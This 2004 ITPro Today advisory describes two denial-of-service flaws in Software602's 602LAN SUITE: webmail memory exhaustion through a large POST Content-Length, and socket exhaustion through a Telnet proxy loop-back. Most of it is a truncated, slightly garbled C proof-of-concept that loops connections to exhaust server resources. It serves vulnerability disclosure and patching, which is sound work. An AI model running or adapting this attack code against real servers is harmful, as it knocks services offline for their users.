Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.
Denial of Service (DoS) in Software602's 602LAN SUITE
Multiple Denial of Service (DoS) vulnerabilities have been discovered in Software602's 602LAN SUITE version 2004.0.04.0909 and prior.
Ken Pfeil
November 9, 2004
3 Min Read
Reported November 7, 2004, byLuigi Auriemma
VERSIONS AFFECTED
DESCRIPTION
Multiple Denial of Service (DoS) vulnerabilities have been discovered in Software602's602LAN SUITE version 2004.0.04.0909 and prior. These two vulnerabilitiesinclude:
Resource consumption through Web mail
An attacker can use the Web mail service (/mail) to consume the remote server's CPU and memory. The attacker uses the POST request with a Content-Length value that specifies the desired amount ofSockets consumption through a Telnet proxy loop
The Telnet proxy is vulnerable to a loop-back attack. It correctly prevents user requests from connecting to the IP address 127.0.0.1, but it doesn't apply the same filter to the server's other network interfaces, so an attacker can force the server to connect to its own local IP addresses, thus consuming all its sockets.
DEMONSTRATION
The discoverer posted the following code to demonstrate proof of concept:
1) {
pcklen = sprintf(pck, MEM,EATRAM);
printf(
"-CPU and memory consumption attack: note that the RAM on the server will"
"start to be eaten after about 15 seconds, so wait and keep sysmon orother"
"resource monitors opened on the server to watch the real effects"
"Will be eaten %d bytes of memory for each connection",
EATRAM>> 20);
for(;;) {
sd =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd< 0) std_err();
fputs("-connection: ", stdout);
if(connect(sd,(struct sockaddr *)&peer, sizeof(peer))
<0) std_err();
if(send(sd,pck, pcklen, 0)
<0) std_err();
if(timeout(sd,1) < 0) {
fputs("ok",stdout);
} else{
fputs("rejected",stdout);
}
close(sd);
}
} else if(attack2) {
pcklen = sprintf(pck,"%s:%dr", inet_ntoa(peer.sin_addr), port);
fputs(
"-sockets consumption attack: when you will see no new output on thescreen"
"means the server has finished all its available sockets",
stdout);
sd = socket(AF_INET,SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr*)&peer, sizeof(peer))
< 0) std_err();
for(;;) {
if(send(sd,pck, pcklen, 0)
<0) std_err();
if(timeout(sd,3) < 0) {
fputs("Serverseems vulnerable!", stdout);
}
len =recv(sd, buff, BUFFSZ, 0);
if(len< 0) std_err();
if(!len)break;
buff[len]= 0x00;
printf("%s",buff);
}
close(sd);
fputs("Server doesn'tseem vulnerable", stdout);
} else {
fputs("Error: you mustchoose an attack, 1 or 2", stdout);
}
return(0);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL,&tout);
� if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("Error:Unable to resolve hostname (%s)", host);
exit(1);
} else host_ip = *(u_long*)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("Error");
exit(1);
}
#endifVENDOR RESPONSE
Software602 advises users to upgrade to 602LAN SUITE version 2004.0.04.1104 orlater.
CREDIT
Discovered by Luigi Auriemma.
About the Author
You May Also Like
